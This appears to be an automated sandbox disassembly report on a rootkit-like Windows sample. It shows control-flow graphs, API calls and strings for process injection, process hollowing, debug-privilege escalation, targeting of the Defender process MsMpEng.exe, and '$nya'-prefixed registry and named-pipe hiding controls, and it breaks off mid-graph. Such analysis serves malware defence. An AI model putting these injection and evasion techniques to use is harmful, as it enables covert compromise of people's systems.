732->737 738 140003312 733->738 734->722 739 1400035a5 734->739 741 1400034cd 735->741 753 140001eec 736->753 737->722 743 140001868 31 API calls 738->743 739->722 781 140002434 739->781 740->698 744 1400032bd 740->744 746 140001868 31 API calls 740->746 769 140001f7c GetProcessHeap HeapAlloc 741->769 743->744 744->698 746->740 754 140001f65 753->754 755 140001f0b OpenProcess 753->755 754->722 755->754 756 140001f23 755->756 757 140002bfc 2 API calls 756->757 758 140001f43 757->758 759 140001f5c CloseHandle 758->759 760 140001f51 CloseHandle 758->760 759->754 760->759 762 1400022d8 SysFreeString SysFreeString 761->762 763 1400021bd CoInitializeSecurity 761->763 762->731 764 140002205 CoCreateInstance 763->764 765 1400021f9 763->765 766 1400022d2 CoUninitialize 764->766 767 140002234 VariantInit 764->767 765->764 765->766 766->762 768 14000228a 767->768 768->766 770 140001cf0 13 API calls 769->770 771 140001fba 770->771 772 140001fe8 GetProcessHeap HeapFree 771->772 773 140001eec 5 API calls 771->773 773->771 775 1400020cc 2 API calls 774->775 776 140002c71 775->776 778 140002120 ReadFile 777->778 779 140002143 778->779 780 14000215d 778->780 779->778 779->780 780->698 780->724 782 14000246f 781->782 806 140002726 781->806 784 1400020cc 2 API calls 782->784 805 1400024ae 782->805 782->806 783 1400024d7 CreateProcessW 783->805 784->805 785 1400028e1 OpenProcess 786 1400028f1 TerminateProcess 785->786 785->805 786->805 787 1400020cc GetModuleHandleA GetProcAddress 787->805 788 140002566 VirtualAllocEx 790 140002595 WriteProcessMemory 788->790 788->805 789 14000273f VirtualAllocEx 791 14000276d WriteProcessMemory 789->791 789->805 792 1400025b7 VirtualProtectEx 790->792 790->805 793 14000278f VirtualProtectEx 791->793 791->805 792->805 793->805 794 140002858 VirtualAlloc 798 140002879 Wow64GetThreadContext 794->798 794->805 795 140002682 VirtualAlloc 797 1400026a7 GetThreadContext 795->797 795->805 796 1400027d0 WriteProcessMemory 796->805 800 1400026c4 WriteProcessMemory 797->800 797->805 801 140002891 WriteProcessMemory 798->801 798->805 799 1400025f9 WriteProcessMemory 799->805 802 1400026ef SetThreadContext 800->802 800->805 803 1400028b6 Wow64SetThreadContext 801->803 801->805 804 140002712 ResumeThread 802->804 802->805 803->805 804->805 804->806 805->783 805->785 805->787 805->788 805->789 805->794 805->795 805->796 805->799 805->806 807 140002643 VirtualProtectEx 805->807 808 14000281a VirtualProtectEx 805->808 806->722 807->805 808->805

                                                                      Callgraph

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                                      • String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                      • API String ID: 3658652915-3222643892
                                                                      • Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                                      • Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
                                                                      • Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                                      • Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 63 140001cc8-140001ccb CloseHandle 59->63 64 140001a29-140001a2d 59->64 61 1400019b3-1400019bf CloseHandle 60->61 62 140001983-14000199e PathFindFileNameW lstrlenW 60->62 61->59 66 1400019c1-1400019db 61->66 62->61 65 1400019a0-1400019b0 StrCpyW 62->65 63->46 64->63 67 140001a33-140001a4b OpenProcessToken 64->67 65->61 69 1400019e0-1400019f2 StrCmpIW 66->69 67->63 68 140001a51-140001a77 GetTokenInformation 67->68 70 140001af4 68->70 71 140001a79-140001a82 GetLastError 68->71 69->63 72 1400019f8-140001a02 69->72 74 140001afb-140001b09 CloseHandle 70->74 71->70 73 140001a84-140001a98 LocalAlloc 71->73 72->59 72->69 73->70 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->63 76 140001b0f-140001b16 74->76 77 140001ae2 75->77 78 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->78 76->63 79 140001b1c-140001b27 76->79 80 140001ae9-140001af2 LocalFree 77->80 78->80 79->63 81 140001b2d-140001b37 79->81 80->74 82 140001b52 81->82 83 140001b39-140001b43 81->83 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->63 84 140001b49-140001b50 83->84 84->85 85->63 92 140001b94-140001bb4 call 1400029a4 StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 97 140001bc8 95->97 96->63 102 140001bf8-140001c21 VirtualAllocEx 96->102 97->63 102->63 103 140001c27-140001c40 WriteProcessMemory 102->103 103->63 104 140001c46-140001c68 call 140002bfc 103->104 104->63 107 140001c6a-140001c72 104->107 107->63 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 CloseHandle 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->63 111->110 112->111
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                      • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                                      • API String ID: 2456419452-2628171563
                                                                      • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                                      • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                                                      • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                                      • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 164 1400031d0-1400031f1 165 140003413-140003419 164->165 166 1400031f7 164->166 167 140003619 call 140001f7c 165->167 168 14000341f-140003425 165->168 169 140003355-140003379 ReadFile 166->169 170 1400031fd-140003203 166->170 173 14000361e-140003630 167->173 171 1400035c9-1400035dc call 1400020fc 168->171 172 14000342b-14000342e 168->172 169->173 174 14000337f-140003386 169->174 176 140003209-14000320c 170->176 177 14000334c-14000334e ExitProcess 170->177 171->173 194 1400035de-1400035ed call 1400020fc 171->194 179 140003434-14000343a 172->179 180 140003515-140003526 call 1400020fc 172->180 174->173 181 14000338c-1400033c0 GetProcessHeap HeapAlloc call 140001cf0 174->181 182 140003212-140003215 176->182 183 14000333d-140003347 176->183 187 1400034e4-14000350e call 140002c5c call 140002c88 ExitProcess 179->187 188 140003440-140003446 179->188 180->173 206 14000352c-14000354e ReadFile 180->206 196 1400033c5-1400033c7 181->196 184 14000321b-140003221 182->184 185 140003330-140003338 182->185 183->173 191 1400032c2-1400032e6 ReadFile 184->191 192 140003227-14000322a 184->192 185->173 188->173 195 14000344c-140003477 RegOpenKeyExW 188->195 191->173 205 1400032ec-1400032f3 191->205 192->173 198 140003230-140003268 GetProcessHeap HeapAlloc K32EnumProcesses 192->198 194->173 216 1400035ef-140003617 ShellExecuteW 194->216 201 1400034b5-1400034df call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 195->201 202 140003479-1400034af RegDeleteValueW * 3 195->202 203 1400033c9-1400033cf 196->203 204 1400033fa-14000340e GetProcessHeap HeapFree 196->204 198->173 207 14000326e-14000327f 198->207 201->173 202->201 203->204 211 1400033d1-1400033e3 203->211 204->173 205->173 212 1400032f9-14000332b call 140001868 * 2 205->212 206->173 213 140003554-14000355b 206->213 207->173 214 140003285-1400032bb call 140001868 * 2 207->214 218 1400033e5-1400033e7 211->218 219 1400033e9-1400033f1 211->219 212->173 213->173 221 140003561-14000359f GetProcessHeap HeapAlloc ReadFile 213->221 240 1400032bd 214->240 216->173 218->219 224 1400033f5 call 140001eec 218->224 219->211 225 1400033f3 219->225 221->204 227 1400035a5-1400035b1 221->227 224->204 225->204 227->204 232 1400035b7-1400035c4 call 140002434 227->232 232->204 240->173
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
                                                                      • String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
                                                                      • API String ID: 2078740077-1712970621
                                                                      • Opcode ID: 91b41d522b7d0f56bb1f99e19882e001774b43b5b119cf9b6761b33b35494708
                                                                      • Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
                                                                      • Opcode Fuzzy Hash: 91b41d522b7d0f56bb1f99e19882e001774b43b5b119cf9b6761b33b35494708
                                                                      • Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                      • String ID:
                                                                      • API String ID: 4084875642-0
                                                                      • Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                                      • Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
                                                                      • Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                                      • Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 3197395349-0
                                                                      • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                      • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                      • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                      • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 3993315683-3572789727
                                                                      • Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                                      • Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
                                                                      • Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                                      • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                      • String ID: .text$C:\Windows\System32\
                                                                      • API String ID: 2721474350-832442975
                                                                      • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                                      • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                                                      • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                                      • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                      • String ID: M$\\.\pipe\$nya-childproc
                                                                      • API String ID: 2203880229-802795868
                                                                      • Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                                      • Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
                                                                      • Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                                      • Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 289 140002cb0-140002cba 290 140002cbd-140002cd0 call 140002300 289->290 293 140002cd2-140002cdb Sleep 290->293 294 140002cdd-140002cea ConnectNamedPipe 290->294 293->290 295 140002d21-140002d26 Sleep 294->295 296 140002cec-140002d0d ReadFile 294->296 297 140002d2c-140002d35 DisconnectNamedPipe 295->297 296->297 298 140002d0f-140002d14 296->298 297->294 298->297 299 140002d16-140002d1d call 1400031d0 298->299 300 140002d1f 299->300 300->297
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                      • String ID: \\.\pipe\$nya-control
                                                                      • API String ID: 2071455217-2728758917
                                                                      • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                                      • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                                                      • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                                      • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 310 140003634-140003688 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 311 14000368a-14000369d K32EnumProcesses 310->311 312 1400036e7-1400036f0 Sleep 311->312 313 14000369f-1400036ae 311->313 312->311 314 1400036d8-1400036e3 313->314 315 1400036b0-1400036b4 313->315 314->312 316 1400036b6 315->316 317 1400036c7-1400036ca call 140003190 315->317 318 1400036ba-1400036bf 316->318 319 1400036ce 317->319 320 1400036c1-1400036c5 318->320 321 1400036d2-1400036d6 318->321 319->321 320->317 320->318 321->314 321->315
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                      • String ID:
                                                                      • API String ID: 3676546796-0
                                                                      • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                                      • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                                                      • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                                      • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 1323846700-0
                                                                      • Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                                      • Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
                                                                      • Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                                      • Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 334 140002d38-140002d3c call 140002d4c 336 140002d41-140002d43 ExitProcess 334->336
                                                                      APIs
                                                                        • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                                                        • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                                                        • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                                                        • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                                                        • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                                                        • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                                                        • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                                                        • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                                                        • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                                                        • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                                                        • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                                                        • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                                                        • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                                                        • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                                                      • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                                      • String ID:
                                                                      • API String ID: 2472495637-0
                                                                      • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                      • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                                      • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                      • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 343 140002434-140002469 344 140002911 343->344 345 14000246f-14000247b 343->345 348 140002913-14000292d 344->348 346 140002493 345->346 347 14000247d-140002487 345->347 350 140002496-140002499 346->350 347->344 349 14000248d-140002491 347->349 349->350 351 1400024d4 350->351 352 14000249b-1400024b6 call 1400020cc 350->352 353 1400024d7-140002532 CreateProcessW 351->353 352->344 369 1400024bc-1400024c7 352->369 355 1400028d7-1400028df 353->355 356 140002538-14000254f 353->356 358 1400028e1-1400028ef OpenProcess 355->358 359 1400028fc-140002903 355->359 360 140002555-14000258f call 1400020cc VirtualAllocEx 356->360 361 140002730-140002767 call 1400020cc VirtualAllocEx 356->361 358->359 362 1400028f1-1400028f6 TerminateProcess 358->362 359->344 364 140002905-14000290c 359->364 360->355 373 140002595-1400025b1 WriteProcessMemory 360->373 361->355 374 14000276d-140002789 WriteProcessMemory 361->374 362->359 364->353 369->344 370 1400024cd 369->370 370->351 373->355 375 1400025b7-1400025dc VirtualProtectEx 373->375 374->355 376 14000278f-1400027b3 VirtualProtectEx 374->376 375->355 378 1400025e2-1400025f0 375->378 376->355 377 1400027b9-1400027c7 376->377 379 140002858-140002877 VirtualAlloc 377->379 380 1400027cd 377->380 381 140002682-1400026a1 VirtualAlloc 378->381 382 1400025f6 378->382 379->355 385 140002879-14000288f Wow64GetThreadContext 379->385 383 1400027d0-1400027f2 WriteProcessMemory 380->383 381->355 384 1400026a7-1400026be GetThreadContext 381->384 386 1400025f9-14000261b WriteProcessMemory 382->386 387 1400028d5 383->387 388 1400027f8-140002803 383->388 384->355 389 1400026c4-1400026e9 WriteProcessMemory 384->389 385->355 390 140002891-1400028b4 WriteProcessMemory 385->390 386->387 391 140002621-14000262c 386->391 387->355 392 140002805-140002809 388->392 393 14000280b 388->393 389->355 394 1400026ef-14000270c SetThreadContext 389->394 390->355 395 